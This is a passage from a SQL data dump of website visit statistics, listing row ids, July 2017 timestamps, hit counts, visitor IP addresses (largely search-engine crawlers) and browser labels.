5.71.113','other'),(135693,1500699294,1,1,0,0,'95.108.181.58','other'),(135694,1500699386,1,1,0,0,'5.45.207.56','other'),(135695,1500699450,1,1,0,0,'37.9.113.138','other'),(135696,1500699634,1,1,0,0,'8.29.198.25','other'),(135697,1500699918,1,1,0,0,'217.182.132.67','other'),(135698,1500699980,1,0,1,0,'66.249.76.109',''),(135699,1500700149,1,1,0,0,'217.182.132.90','other'),(135700,1500700194,1,1,0,0,'5.45.207.83','other'),(135701,1500700426,1,1,0,0,'37.9.113.128','other'),(135702,1500700872,1,1,0,0,'178.154.171.3','other'),(135703,1500700915,2,2,0,0,'91.209.11.236','other'),(135704,1500700998,1,0,1,0,'66.249.76.91',''),(135705,1500701276,1,1,0,0,'217.69.133.203','other'),(135706,1500701281,1,1,0,0,'5.45.207.57','other'),(135707,1500701420,1,1,0,0,'213.180.203.32','other'),(135708,1500701709,1,1,0,0,'137.74.207.110','other'),(135709,1500701777,1,1,0,0,'217.182.132.147','other'),(135710,1500701992,1,1,0,0,'51.255.65.82','other'),(135711,1500702371,1,1,0,0,'217.69.133.9','other'),(135712,1500702460,1,1,0,0,'91.209.11.236','other'),(135713,1500702476,1,1,0,0,'51.255.65.6','other'),(135714,1500702537,1,1,0,0,'51.255.71.122','other'),(135715,1500702604,1,1,0,0,'137.74.203.194','other'),(135716,1500702707,1,1,0,0,'5.45.207.57','other'),(135717,1500703051,1,1,0,0,'51.255.65.25','other'),(135718,1500703149,1,1,0,0,'95.108.181.57','other'),(135719,1500703152,1,1,0,0,'95.108.181.69','other'),(135720,1500703235,1,1,0,0,'178.154.171.3','other'),(135721,1500703746,3,3,0,0,'91.209.11.236','other'),(135722,1500703777,1,1,0,0,'66.102.9.27','chrome'),(135723,1500703994,1,0,1,0,'66.249.66.156',''),(135724,1500704733,1,1,0,0,'51.255.65.224','other'),(135725,1500704786,1,1,0,0,'91.209.11.236','other'),(135726,1500705076,1,0,1,0,'68.180.230.48',''),(135727,1500705162,1,1,0,0,'51.255.65.68','other'),(135728,1500705199,1,0,1,0,'66.249.76.93',''),(135729,1500705275,1,1,0,0,'213.180.203.14','other'),(135730,1500705281,1,1,0,0,'51.255.71.110','other'),(135731,1500705801,1,1,0,0,'151.80.27.116','other'),(135732,1500705854,1,1,0,0,'37.9.113.94','other'),(135733,1500706198,1,1,0,0,'217.69.133.4','other'),(135734,1500706236,1,0,1,0,'66.249.76.91',''),(135735,1500706592,1,1,0,0,'137.74.207.170','other'),(135736,1500706620,1,1,0,0,'5.45.207.66','other'),(135737,1500706724,1,1,0,0,'91.209.11.236','other'),(135738,1500706737,1,1,0,0,'40.77.167.84','other'),(135739,1500706867,1,1,0,0,'95.108.181.52','other'),(135740,1500707194,1,1,0,0,'5.45.207.57','other'),(135741,1500707356,1,1,0,0,'5.45.207.56','other'),(135742,1500707490,1,1,0,0,'216.244.66.246','other'),(135743,1500707679,1,1,0,0,'51.255.65.16','other'),(135744,1500707704,1,0,1,0,'66.249.66.155',''),(135745,1500707845,1,1,0,0,'217.69.133.3','other'),(135746,1500707875,1,1,0,0,'217.182.132.83','other'),(135747,1500707909,1,1,0,0,'217.182.132.146','other'),(135748,1500708096,2,2,0,0,'91.209.11.236','other'),(135749,1500708242,1,1,0,0,'5.45.207.83','other'),(135750,1500708734,1,1,0,0,'37.9.113.128','other'),(135751,1500709016,1,1,0,0,'217.182.132.83','other'),(135752,1500709559,1,1,0,0,'95.108.181.69','other'),(135753,1500710456,1,1,0,0,'8.29.198.27','other'),(135754,1500710623,1,1,0,0,'37.9.113.78','other'),(135755,1500710693,4,4,0,0,'216.244.66.194','other'),(135756,1500710893,1,1,0,0,'178.154.171.59','other'),(135757,1500710945,1,1,0,0,'217.182.132.32','other'),(135758,1500711708,1,0,1,0,'66.249.76.108',''),(135759,1500711837,1,1,0,0,'91.209.11.236','other'),(135760,1500711899,1,1,0,0,'213.180.203.21','other'),(135761,1500712094,1,1,0,0,'217.182.132.94','other'),(135762,1500712139,1,1,0,0,'51.255.65.25','other'),(135763,1500712206,1,1,0,0,'37.9.113.78','other'),(135764,1500712383,1,0,1,0,'66.249.76.89',''),(135765,1500712419,1,1,0,0,'51.255.65.42','other'),(135766,1500712504,1,1,0,0,'37.9.113.138','other'),(135767,1500712630,1,1,0,0,'37.9.113.128','other'),(135768,1500712854,1,1,0,0,'217.182.132.193','other'),(135769,1500712881,1,0,1,0,'66.249.76.107',''),(135770,1500713337,1,1,0,0,'217.69.133.194','other'),(135771,1500713355,1,1,0,0,'217.182.132.188','other'),(135772,1500713529,1,1,0,0,'91.209.11.236','other'),(135773,1500713556,1,1,0,0,'217.182.132.34','other'),(135774,1500713619,1,1,0,0,'217.182.132.153','other'),(135775,1500713659,1,1,0,0,'217.182.132.27','other'),(135776,1500713780,1,1,0,0,'51.255.64.106','other'),(135777,1500713801,1,1,0,0,'217.182.132.190','other'),(135778,1500714011,1,1,0,0,'51.255.65.84','other'),(135779,1500714235,1,1,0,0,'164.132.162.160','other'),(135780,1500714266,1,1,0,0,'217.182.132.192','other'),(135781,1500714316,1,1,0,0,'51.255.65.56','other'),(135782,1500714590,1,1,0,0,'77.121.189.229','chrome'),(135783,1500714600,1,1,0,0,'216.244.66.246','other'),(135784,1500714917,1,1,0,0,'91.209.11.236','other'),(135785,1500714984,1,1,0,0,'217.182.132.70','other'),(135786,1500715822,1,1,0,0,'213.180.203.42','other'),(135787,1500716150,1,1,0,0,'95.108.181.52','other'),(135788,1500716169,1,1,0,0,'137.74.201.108','other'),(135789,1500716201,1,1,0,0,'5.45.207.56','other'),(135790,1500716223,1,1,0,0,'95.221.51.157','chrome'),(135791,1500716224,1,1,0,0,'95.28.52.127','chrome'),(135792,1500716318,1,1,0,0,'37.9.113.138','other'),(135793,1500716339,1,1,0,0,'213.180.203.32','other'),(135794,1500716412,1,1,0,0,'213.180.203.14','other'),(135795,1500716454,1,1,0,0,'180.76.15.158','other'),(135796,1500716495,1,1,0,0,'5.165.244.244','msie'),(135797,1500716496,1,1,0,0,'37.204.39.44','msie'),(135798,1500716560,1,1,0,0,'178.154.171.59','other'),(135799,1500716672,1,1,0,0,'51.255.65.74','other'),(135800,1500716689,1,1,0,0,'137.74.207.114','other'),(135801,1500716788,1,1,0,0,'46.200.126.207','firefox'),(135802,1500716950,1,1,0,0,'5.45.207.66','other'),(135803,1500717110,1,1,0,0,'217.182.132.35','other'),(135804,1500717147,1,1,0,0,'5.45.207.64','other'),(135805,1500717151,2,2,0,0,'178.154.171.3','other'),(135806,1500717186,1,1,0,0,'217.69.133.6','other'),(135807,1500717419,1,1,0,0,'51.255.64.106','other'),(135808,1500717963,4,4,0,0,'216.244.66.194','other'),(135809,1500718029,3,3,0,0,'216.244.66.246','other'),(135810,1500718209,1,1,0,0,'195.69.222.18','other'),(135811,1500718512,1,1,0,0,'178.154.171.59','other'),(135812,1500718845,1,1,0,0,'217.69.133.203','other'),(135813,1500718847,1,1,0,0,'217.69.133.194','other'),(135814,1500718848,1,1,0,0,'217.69.133.4','other'),(135815,1500719373,1,1,0,0,'91.209.11.236','other'),(135816,1500719386,1,0,1,0,'66.249.76.108',''),(135817,1500719453,1,1,0,0,'5.45.207.57','other'),(135818,1500719860,1,1,0,0,'51.255.65.14','other'),(135819,1500719890,1,1,0,0,'95.108.181.52','other'),(135820,1500720279,1,0,1,0,'66.249.76.109',''),(135821,1500720505,2,2,0,0,'91.209.11.236','other'),(135822,1500720709,1,1,0,0,'66.249.76.91','chrome'),(135823,1500720785,1,1,0,0,'213.180.203.42','other'),(135824,1500721057,1,1,0,0,'195.211.175.37','chrome'),(135825,1500721309,1,1,0,0,'8.29.198.27','other'),(135826,1500722078,1,1,0,0,'213.180.203.32','other'),(135827,1500722109,1,1,0,0,'217.182.132.50','other'),(135828,1500722616,1,1,0,0,'91.209.11.236','other'),(135829,1500722740,1,1,0,0,'95.108.181.69','other'),(135830,1500723091,1,1,0,0,'95.108.181.52','other'),(135831,1500723278,1,1,0,0,'5.45.207.56','other'),(135832,1500723326,1,1,0,0,'217.182.132.191','other'),(135833,1500723462,1,1,0,0,'217.182.132.15','other'),(135834,1500723705,1,1,0,0,'178.154.171.59','other'),(135835,1500724210,1,1,0,0,'91.196.178.40','chrome'),(135836,1500724345,1,1,0,0,'91.209.11.236','other'),(135837,1500724448,1,1,0,0,'51.255.65.53','other'),(135838,1500725052,3,3,0,0,'216.244.66.246','other'),(135839,1500725971,1,1,0,0,'5.45.207.83','other'),(135840,1500726237,1,1,0,0,'78.111.190.252','chrome'),(135841,1500726289,1,1,0,0,'91.209.11.236','other'),(135842,1500726485,1,1,0,0,'217.182.132.156','other'),(135843,1500726656,1,1,0,0,'185.94.218.210','chrome'),(135844,1500727316,1,1,0,0,'95.108.181.57','other'),(135845,1500727413,1,0,1,0,'66.249.76.93',''),(135846,1500727861,1,1,0,0,'95.108.181.63','other'),(135847,1500728378,1,1,0,0,'195.211.175.37','chrome'),(135848,1500728393,1,1,0,0,'217.182.132.66','other'),(135849,1500728742,1,1,0,0,'217.182.132.81','other'),(135850,1500729774,1,1,0,0,'217.182.132.91','other'),(135851,1500729828,1,1,0,0,'51.255.65.85','other'),(135852,1500730072,1,1,0,0,'91.209.11.236','other'),(135853,1500730475,1,1,0,0,'217.182.132.30','other'),(135854,1500730573,1,1,0,0,'37.9.113.138','other'),(135855,1500730667,3,3,0,0,'54.165.59.7','other'),(135856,1500730951,1,1,0,0,'66.249.76.91','chrome'),(135857,1500730970,1,1,0,0,'46.161.9.6','chrome'),(135858,1500731020,1,1,0,0,'51.255.65.56','other'),(135859,1500731021,1,1,0,0,'195.211.175.37','chrome'),(135860,1500731342,1,0,1,0,'66.249.76.107',''),(135861,1500731442,3,3,0,0,'91.209.11.236','other'),(135862,1500731599,2,0,2,0,'66.249.76.93',''),(135863,1500731648,1,1,0,0,'51.255.65.3','other'),(135864,1500731875,1,1,0,0,'5.45.207.57','other'),(135865,1500732141,1,1,0,0,'8.29.198.27','other'),(135866,1500732206,1,0,1,0,'66.249.66.199',''),(135867,1500732458,1,1,0,0,'164.132.162.153','other'),(135868,1500732467,3,3,0,0,'216.244.66.194','other'),(135869,1500732910,1,0,1,0,'66.249.76.109',''),(135870,1500733244,1,1,0,0,'37.9.113.128','other'),(135871,1500733290,2,2,0,0,'91.209.11.236','other'),(135872,1500733619,1,1,0,0,'37.9.113.94','other'),(135873,1500733677,1,1,0,0,'66.249.76.109','chrome'),(135874,1500733795,1,1,0,0,'95.108.181.60','other'),(135875,1500733803,1,1,0,0,'217.182.132.192','other'),(135876,1500734030,1,1,0,0,'51.255.65.95','other'),(135877,1500734139,1,1,0,0,'95.108.181.52','other'),(135878,1500734141,1,1,0,0,'213.180.203.32','other'),(135879,1500734174,2,2,0,0,'216.244.66.246','other'),(135880,1500734331,1,1,0,0,'217.69.133.6','other'),(135881,1500735172,1,1,0,0,'46.161.9.39','chrome'),(135882,1500735341,1,1,0,0,'51.255.71.114','other'),(135883,1500735434,1,1,0,0,'51.255.71.130','other'),(135884,1500735518,1,1,0,0,'91.209.11.236','other'),(135885,1500735624,1,0,1,0,'66.249.66.195',''),(135886,1500735697,1,1,0,0,'213.180.203.43','other'),(135887,1500735844,1,1,0,0,'213.180.203.14','other'),(135888,1500735847,1,1,0,0,'178.154.171.18','other'),(135889,1500735992,1,1,0,0,'5.45.207.66','other'),(135890,1500736157,1,1,0,0,'178.154.171.59','other'),(135891,1500736390,1,1,0,0,'213.180.203.32','other'),(135892,1500736586,1,1,0,0,'217.182.132.74','other'),(135893,1500736638,2,2,0,0,'217.182.132.183','other'),(135894,1500736871,1,1,0,0,'5.45.207.83','other'),(135895,1500736876,1,1,0,0,'5.45.207.56','other'),(135896,1500736887,2,2,0,0,'91.209.11.236','other'),(135897,1500736898,2,2,0,0,'95.108.181.60','other'),(135898,1500737083,1,1,0,0,'178.154.171.53','other'),(135899,1500737130,1,1,0,0,'213.180.203.21','other'),(135900,1500737427,1,1,0,0,'5.45.207.66','other'),(135901,1500737758,1,1,0,0,'95.108.181.57','other'),(135902,1500737903,3,3,0,0,'216.244.66.194','other'),(135903,1500738118,1,1,0,0,'144.76.182.48','chrome'),(135904,1500738206,3,3,0,0,'216.244.66.246','other'),(135905,1500738230,1,1,0,0,'144.76.182.48','firefox'),(135906,1500738319,1,1,0,0,'51.255.65.45','other'),(135907,1500738785,1,1,0,0,'217.182.132.23','other'),(135908,1500738835,1,1,0,0,'137.74.207.109','other'),(135909,1500739334,1,1,0,0,'213.180.203.32','other'),(135910,1500739382,1,1,0,0,'46.201.84.125','chrome'),(135911,1500739404,1,1,0,0,'95.108.181.58','other'),(135912,1500739830,3,3,0,0,'216.244.66.194','other'),(135913,1500740110,1,1,0,0,'40.77.167.123','other'),(135914,1500740458,1,0,1,0,'66.249.76.93',''),(135915,1500740496,1,1,0,0,'213.180.203.32','other'),(135916,1500740952,1,1,0,0,'180.76.15.10','other'),(135917,1500741251,1,1,0,0,'66.249.76.107','chrome'),(135918,1500741429,1,1,0,0,'95.108.181.63','other'),(135919,1500741795,2,2,0,0,'91.209.11.236','other'),(135920,1500741814,1,1,0,0,'51.255.65.55','other'),(135921,1500742032,1,1,0,0,'5.45.207.83','other'),(135922,1500742050,1,1,0,0,'51.255.71.121','other'),(135923,1500742064,1,1,0,0,'46.161.9.39','firefox'),(135924,1500742840,1,1,0,0,'217.182.132.32','other'),(135925,1500742842,1,1,0,0,'95.108.181.60','other'),(135926,1500742925,1,1,0,0,'37.9.113.78','other'),(135927,1500742982,1,1,0,0,'8.29.198.26','other'),(135928,1500743065,1,1,0,0,'95.108.181.69','other'),(135929,1500743141,1,1,0,0,'213.180.203.18','other'),(135930,1500743199,1,0,1,0,'66.249.66.199',''),(135931,1500743249,1,1,0,0,'217.182.132.88','other'),(135932,1500743420,1,0,1,0,'66.249.76.109',''),(135933,1500743512,1,1,0,0,'164.132.162.159','other'),(135934,1500743528,1,1,0,0,'51.255.71.133','other'),(135935,1500743806,2,2,0,0,'216.244.66.246','other'),(135936,1500743850,1,0,1,0,'66.249.76.107',''),(135937,1500744434,1,1,0,0,'51.255.65.28','other'),(135938,1500744670,3,3,0,0,'91.209.11.236','other'),(135939,1500744776,2,2,0,0,'213.180.203.42','other'),(135940,1500745060,1,1,0,0,'95.108.181.58','other'),(135941,1500745148,1,1,0,0,'217.182.132.75','other'),(135942,1500745342,1,1,0,0,'213.180.203.25','other'),(135943,1500745701,1,0,1,0,'66.249.76.89',''),(135944,1500745899,1,1,0,0,'66.249.76.107','chrome'),(135945,1500745980,1,1,0,0,'213.180.203.43','other'),(135946,1500746205,1,1,0,0,'213.180.203.32','other'),(135947,1500746353,1,1,0,0,'137.74.207.164','other'),(135948,1500746485,1,1,0,0,'178.154.171.3','other'),(135949,1500746730,1,1,0,0,'51.255.65.61','other'),(135950,1500746960,1,1,0,0,'217.182.132.73','other'),(135951,1500747123,1,1,0,0,'217.182.132.60','other'),(135952,1500747152,2,2,0,0,'91.209.11.236','other'),(135953,1500747265,2,2,0,0,'51.255.71.100','other'),(135954,1500747934,1,1,0,0,'178.154.171.3','other'),(135955,1500748060,1,1,0,0,'51.255.65.41','other'),(135956,1500748188,3,3,0,0,'216.244.66.194','other'),(135957,1500748189,1,1,0,0,'178.154.171.45','other'),(135958,1500748294,1,1,0,0,'91.196.178.67','chrome'),(135959,1500748532,1,1,0,0,'40.77.167.84','other'),(135960,1500748696,3,3,0,0,'216.244.66.246','other'),(135961,1500749450,1,1,0,0,'213.180.203.43','other'),(135962,1500749605,1,1,0,0,'37.9.113.78','other'),(135963,1500749689,1,1,0,0,'91.209.11.236','other'),(135964,1500749859,1,1,0,0,'51.255.65.21','other'),(135965,1500750004,1,1,0,0,'5.45.207.83','other'),(135966,1500750358,1,1,0,0,'95.108.181.52','other'),(135967,1500750430,1,1,0,0,'217.182.132.18','other'),(135968,1500750456,1,1,0,0,'178.154.171.53','other'),(135969,1500750582,1,1,0,0,'213.180.203.32','other'),(135970,1500750638,2,1,1,0,'66.249.76.108',''),(135971,1500750807,1,1,0,0,'5.45.207.64','other'),(135972,1500750867,1,1,0,0,'217.182.132.35','other'),(135973,1500750973,2,2,0,0,'37.55.56.117','other'),(135974,1500751442,1,1,0,0,'91.209.11.236','other'),(135975,1500751515,5,5,0,0,'216.244.66.194','other'),(135976,1500751691,1,1,0,0,'51.255.65.65','other'),(135977,1500751892,1,1,0,0,'217.69.133.5','other'),(135978,1500751899,1,1,0,0,'217.69.133.6','other'),(135979,1500751950,1,0,1,0,'66.249.76.108',''),(135980,1500751978,1,0,1,0,'66.249.66.195',''),(135981,1500752246,1,1,0,0,'178.154.171.53','other'),(135982,1500752408,1,1,0,0,'217.182.132.82','other'),(135983,1500752856,1,0,1,0,'66.249.76.89',''),(135984,1500752979,1,0,1,0,'66.249.66.156',''),(135985,1500753016,1,1,0,0,'66.249.76.93','chrome'),(135986,1500753045,1,1,0,0,'66.249.76.108','chrome'),(135987,1500753067,1,1,0,0,'91.209.11.236','other'),(135988,1500753083,1,1,0,0,'37.9.113.128','other'),(135989,1500753318,1,1,0,0,'137.74.207.119','other'),(135990,1500753684,1,1,0,0,'51.255.65.15','other'),(135991,1500753760,1,1,0,0,'217.182.132.57','other'),(135992,1500753821,1,1,0,0,'8.29.198.26','other'),(135993,1500753858,1,1,0,0,'176.125.39.20','chrome'),(135994,1500754014,1,1,0,0,'51.255.65.17','other'),(135995,1500754117,1,1,0,0,'216.244.66.194','other'),(135996,1500754310,1,1,0,0,'51.255.65.44','other'),(135997,1500754325,1,0,1,0,'66.249.76.108',''),(135998,1500754385,1,1,0,0,'66.249.66.201','chrome'),(135999,1500754645,1,1,0,0,'51.255.71.119','other'),(136000,1500754774,2,2,0,0,'95.108.181.52','other'),(136001,1500754797,1,1,0,0,'37.9.113.99','other'),(136002,1500754890,4,4,0,0,'216.244.66.246','other'),(136003,1500754930,1,1,0,0,'137.74.207.109','other'),(136004,1500754936,1,1,0,0,'91.209.11.236','other'),(136005,1500755215,1,1,0,0,'216.244.66.237','other'),(136006,1500755358,1,1,0,0,'66.249.76.91','chrome'),(136007,1500755424,1,1,0,0,'66.249.76.93','chrome'),(136008,1500755452,1,0,1,0,'66.249.66.74',''),(136009,1500755574,1,1,0,0,'37.9.113.128','other'),(136010,1500755630,1,1,0,0,'130.180.210.33','chrome'),(136011,1500755649,1,1,0,0,'37.9.113.78','other'),(136012,1500755709,1,1,0,0,'217.69.133.9','other'),(136013,1500755742,1,1,0,0,'213.180.203.25','other'),(136014,1500756028,1,1,0,0,'95.108.181.58','other'),(136015,1500756306,1,0,1,0,'66.249.76.107',''),(136016,1500756435,1,1,0,0,'91.209.11.236','other'),(136017,1500756455,1,1,0,0,'157.55.39.93','other'),(136018,1500756462,1,1,0,0,'217.182.132.68','other'),(136019,1500756495,1,1,0,0,'216.244.66.246','other'),(136020,1500756632,1,1,0,0,'130.180.210.33','chrome'),(136021,1500756881,1,1,0,0,'51.255.71.114','other'),(136022,1500757398,1,1,0,0,'217.69.133.3','other'),(136023,1500757747,1,0,1,0,'66.249.76.91',''),(136024,1500757962,2,2,0,0,'216.244.66.194','other'),(136025,1500758046,1,1,0,0,'37.9.113.78','other'),(136026,1500758307,1,1,0,0,'91.209.11.236','other'),(136027,1500758502,1,1,0,0,'217.182.132.6','other'),(136028,1500758512,1,1,0,0,'178.154.171.3','other'),(136029,1500758616,1,1,0,0,'51.255.65.6','other'),(136030,1500759457,2,2,0,0,'217.182.132.179','other'),(136031,1500759850,1,1,0,0,'217.182.132.154','other'),(136032,1500760063,1,1,0,0,'37.9.113.138','other'),(136033,1500760132,1,1,0,0,'91.209.11.236','other'),(136034,1500760138,1,1,0,0,'51.255.65.56','other'),(136035,1500760293,2,2,0,0,'216.244.66.246','other'),(136036,1500760294,1,1,0,0,'51.255.65.96','other'),(136037,1500760881,1,1,0,0,'217.182.132.20','other'),(136038,1500761105,1,1,0,0,'51.255.65.224','other'),(136040,1500761110,1,1,0,0,'213.180.203.14','other'),(136041,1500761435,1,1,0,0,'51.255.65.72','other'),(136042,1500761778,3,3,0,0,'91.209.11.236','other'),(136043,1500762437,1,1,0,0,'217.182.132.27','other'),(136044,1500762618,1,1,0,0,'137.74.207.114','other'),(136045,1500762630,1,1,0,0,'216.244.66.246','other'),(136046,1500762892,1,1,0,0,'217.69.133.3','other'),(136047,1500762900,3,3,0,0,'216.244.66.194','other'),(136048,1500763784,1,1,0,0,'95.108.181.69','other'),(136049,1500764029,1,1,0,0,'217.182.132.20','other'),(136050,1500764057,1,1,0,0,'213.180.203.43','other'),(136051,1500764494,1,1,0,0,'217.182.132.154','other'),(136052,1500764530,1,1,0,0,'5.45.207.66','other'),(136053,1500764593,1,0,1,0,'66.249.66.76',''),(136054,1500764665,1,1,0,0,'8.29.198.25','other'),(136055,1500764927,1,1,0,0,'178.154.171.18','other'),(136056,1500764957,1,1,0,0,'213.180.203.21','other'),(136057,1500765095,1,1,0,0,'217.182.132.170','other'),(136058,1500765574,1,1,0,0,'95.108.181.57','other'),(136059,1500765870,1,1,0,0,'91.209.11.236','other'),(136060,1500766015,1,1,0,0,'51.255.65.28','other'),(136061,1500766080,1,1,0,0,'217.182.132.32','other'),(136062,1500766408,1,1,0,0,'216.244.66.246','other'),(136063,1500766619,1,1,0,0,'213.180.203.21','other'),(136064,1500766665,1,1,0,0,'51.255.65.31','other'),(136065,1500766695,1,1,0,0,'51.255.65.13','other'),(136066,1500766706,1,1,0,0,'217.69.133.4','other'),(136067,1500767013,1,1,0,0,'66.249.66.155','chrome'),(136068,1500767233,1,1,0,0,'213.180.203.42','other'),(136069,1500767366,1,1,0,0,'5.45.207.66','other'),(136070,1500767411,1,1,0,0,'66.249.66.156','chrome'),(136071,1500767532,1,1,0,0,'213.180.203.25','other'),(136072,1500767798,1,1,0,0,'91.209.11.236','other'),(136073,1500767799,1,1,0,0,'37.9.113.128','other'),(136074,1500767899,1,1,0,0,'40.77.167.123','other'),(136075,1500767922,3,3,0,0,'216.244.66.194','other'),(136076,1500768014,1,1,0,0,'95.108.181.52','other'),(136077,1500768080,2,2,0,0,'62.210.203.161','chrome'),(136078,1500768402,1,1,0,0,'217.69.133.194','other'),(136079,1500768692,1,1,0,0,'213.180.203.21','other'),(136080,1500769228,2,2,0,0,'40.77.167.123','other'),(136081,1500769530,1,1,0,0,'37.9.113.138','other'),(136082,1500769582,1,1,0,0,'157.55.39.93','other'),(136083,1500769952,3,3,0,0,'216.244.66.194','other'),(136084,1500770723,5,5,0,0,'216.244.66.246','other'),(136085,1500770883,1,1,0,0,'91.209.11.236','other'),(136086,1500771713,2,2,0,0,'178.154.171.59','other'),(136087,1500771745,1,1,0,0,'5.45.207.66','other'),(136088,1500771784,1,1,0,0,'217.182.132.79','other'),(136089,1500771980,1,1,0,0,'164.132.162.154','other'),(136090,1500772715,1,1,0,0,'217.182.132.90','other'),(136091,1500773767,1,1,0,0,'51.255.71.117','other'),(136092,1500773790,1,0,1,0,'68.180.230.48',''),(136093,1500773977,1,1,0,0,'217.69.133.194','other'),(136094,1500774090,1,0,1,0,'66.249.66.76',''),(136095,1500774118,1,0,1,0,'66.249.76.89',''),(136096,1500774838,1,1,0,0,'51.255.71.111','other'),(136097,1500774888,1,1,0,0,'51.255.71.113','other'),(136098,1500774972,1,1,0,0,'217.182.132.53','other'),(136099,1500775144,3,3,0,0,'216.244.66.194','other'),(136100,1500775347,1,1,0,0,'217.182.132.187','other'),(136101,1500775494,1,1,0,0,'8.29.198.27','other'),(136102,1500775565,1,1,0,0,'213.180.203.32','other'),(136103,1500775939,1,1,0,0,'178.154.171.3','other'),(136104,1500775962,3,3,0,0,'216.244.66.246','other'),(136105,1500776023,1,1,0,0,'51.255.65.74','other'),(136106,1500776210,1,1,0,0,'91.209.11.236','other'),(136107,1500776278,1,0,1,0,'66.249.76.107',''),(136108,1500776522,2,2,0,0,'62.210.203.161','chrome'),(136109,1500776991,1,1,0,0,'95.108.181.52','other'),(136110,1500777907,1,1,0,0,'213.180.203.43','other'),(136111,1500777976,1,1,0,0,'217.182.132.19','other'),(136112,1500778161,1,1,0,0,'51.255.65.52','other'),(136113,1500778243,1,1,0,0,'91.209.11.236','other'),(136114,1500778385,1,1,0,0,'217.69.133.2','other'),(136115,1500778834,1,1,0,0,'51.255.65.87','other'),(136116,1500778945,1,1,0,0,'95.108.181.57','other'),(136117,1500779051,1,0,1,0,'68.180.230.48',''),(136118,1500779285,1,1,0,0,'95.108.181.58','other'),(136119,1500779380,1,1,0,0,'91.209.11.236','other'),(136120,1500779424,1,1,0,0,'137.74.201.108','other'),(136121,1500779783,1,1,0,0,'37.9.113.128','other'),(136122,1500780025,1,1,0,0,'51.255.65.97','other'),(136123,1500780306,1,1,0,0,'217.182.132.60','other'),(136124,1500780739,1,1,0,0,'51.255.71.125','other'),(136125,1500781183,1,1,0,0,'213.180.203.14','other'),(136126,1500781253,1,1,0,0,'40.77.167.123','other'),(136127,1500781314,1,1,0,0,'37.9.113.128','other'),(136128,1500781413,3,3,0,0,'216.244.66.194','other'),(136129,1500781997,1,1,0,0,'178.154.171.59','other'),(136130,1500782020,1,1,0,0,'91.209.11.236','other'),(136131,1500782484,1,1,0,0,'217.182.132.146','other'),(136132,1500782587,1,1,0,0,'213.180.203.32','other'),(136133,1500782625,1,1,0,0,'178.255.215.94','other'),(136134,1500782737,1,0,1,0,'68.180.230.48',''),(136135,1500782847,1,1,0,0,'5.45.207.66','other'),(136136,1500782877,4,4,0,0,'216.244.66.246','other'),(136137,1500783177,1,1,0,0,'178.154.171.59','other'),(136138,1500783267,1,1,0,0,'180.76.15.11','other'),(136139,1500783742,1,0,1,0,'66.249.76.89',''),(136140,1500783805,1,1,0,0,'95.108.181.63','other'),(136141,1500784168,1,1,0,0,'213.180.203.14','other'),(136142,1500784840,1,1,0,0,'5.45.207.57','other'),(136143,1500785365,1,1,0,0,'91.209.11.236','other'),(136144,1500785425,1,0,1,0,'66.249.66.76',''),(136145,1500785433,1,1,0,0,'217.182.132.95','other'),(136146,1500786320,1,1,0,0,'8.29.198.25','other'),(136147,1500786414,1,1,0,0,'180.76.15.156','other'),(136148,1500786459,1,1,0,0,'178.154.171.3','other'),(136149,1500786579,1,0,1,0,'66.249.76.108',''),(136150,1500786927,1,1,0,0,'213.180.203.42','other'),(136151,1500787083,1,1,0,0,'164.132.162.164','other'),(136152,1500787104,1,0,1,0,'66.249.76.93',''),(136153,1500787162,2,2,0,0,'91.209.11.236','other'),(136154,1500787295,1,1,0,0,'66.249.66.155','chrome'),(136155,1500787380,5,5,0,0,'216.244.66.246','other'),(136156,1500787430,2,2,0,0,'216.244.66.194','other'),(136157,1500787631,1,1,0,0,'51.255.65.52','other'),(136158,1500787978,1,1,0,0,'51.255.71.119','other'),(136159,1500788436,1,0,1,0,'66.249.76.107',''),(136160,1500788627,1,1,0,0,'217.182.132.176','other'),(136161,1500788807,2,2,0,0,'37.9.113.138','other'),(136162,1500788862,1,1,0,0,'91.209.11.236','other'),(136163,1500788863,1,1,0,0,'217.182.132.187','other'),(136164,1500788988,1,1,0,0,'37.9.113.128','other'),(136165,1500789455,1,1,0,0,'5.45.207.57','other'),(136166,1500789732,1,1,0,0,'217.182.132.77','other'),(136167,1500790162,1,1,0,0,'51.255.65.87','other'),(136168,1500790534,1,1,0,0,'217.182.132.79','other'),(136169,1500790586,1,1,0,0,'178.154.171.3','other'),(136170,1500790621,2,2,0,0,'62.210.203.161','chrome'),(136171,1500790863,1,1,0,0,'66.249.66.156','chrome'),(136172,1500790884,1,1,0,0,'95.108.181.63','other'),(136173,1500790895,1,1,0,0,'178.154.171.59','other'),(136174,1500791166,8,8,0,0,'216.244.66.194','other'),(136175,1500791229,1,1,0,0,'213.180.203.42','other'),(136176,1500791688,1,1,0,0,'178.154.171.18','other'),(136177,1500791858,1,1,0,0,'213.180.203.21','other'),(136178,1500791989,1,1,0,0,'51.255.65.66','other'),(136179,1500792046,1,1,0,0,'95.108.181.60','other'),(136180,1500792162,1,0,1,0,'66.249.76.108',''),(136181,1500792530,1,1,0,0,'91.209.11.236','other'),(136182,1500793059,3,3,0,0,'216.244.66.246','other'),(136183,1500793188,1,1,0,0,'51.255.65.83','other'),(136184,1500793864,1,1,0,0,'95.108.181.63','other'),(136185,1500794100,1,1,0,0,'91.209.11.236','other'),(136186,1500794154,1,1,0,0,'217.182.132.14','other'),(136187,1500794215,1,0,1,0,'66.249.76.89',''),(136188,1500794235,2,0,2,0,'66.249.76.91',''),(136189,1500794350,1,1,0,0,'178.154.171.59','other'),(136190,1500794376,1,1,0,0,'188.255.91.175','firefox'),(136191,1500794483,1,1,0,0,'217.182.132.4','other'),(136192,1500794556,1,1,0,0,'51.255.65.42','other'),(136193,1500794610,1,1,0,0,'5.45.207.57','other'),(136194,1500794622,1,1,0,0,'178.154.171.53','other'),(136195,1500794645,1,0,1,0,'66.249.76.109',''),(136196,1500794836,1,1,0,0,'216.244.66.246','other'),(136197,1500794884,1,1,0,0,'217.69.133.3','other'),(136198,1500794887,1,1,0,0,'217.69.133.2','other'),(136199,1500794919,1,1,0,0,'217.182.132.186','other'),(136200,1500794976,1,1,0,0,'37.9.113.128','other'),(136201,1500795272,1,1,0,0,'217.182.132.28','other'),(136202,1500795443,1,1,0,0,'217.182.132.23','other'),(136203,1500795475,1,1,0,0,'51.255.65.9','other'),(136204,1500795806,1,1,0,0,'91.209.11.236','other'),(136205,1500796178,1,1,0,0,'217.182.132.20','other'),(136206,1500796656,1,1,0,0,'217.182.132.82','other'),(136207,1500797145,1,1,0,0,'8.29.198.26','other'),(136208,1500797510,3,3,0,0,'91.209.11.236','other'),(136209,1500797983,1,1,0,0,'217.182.132.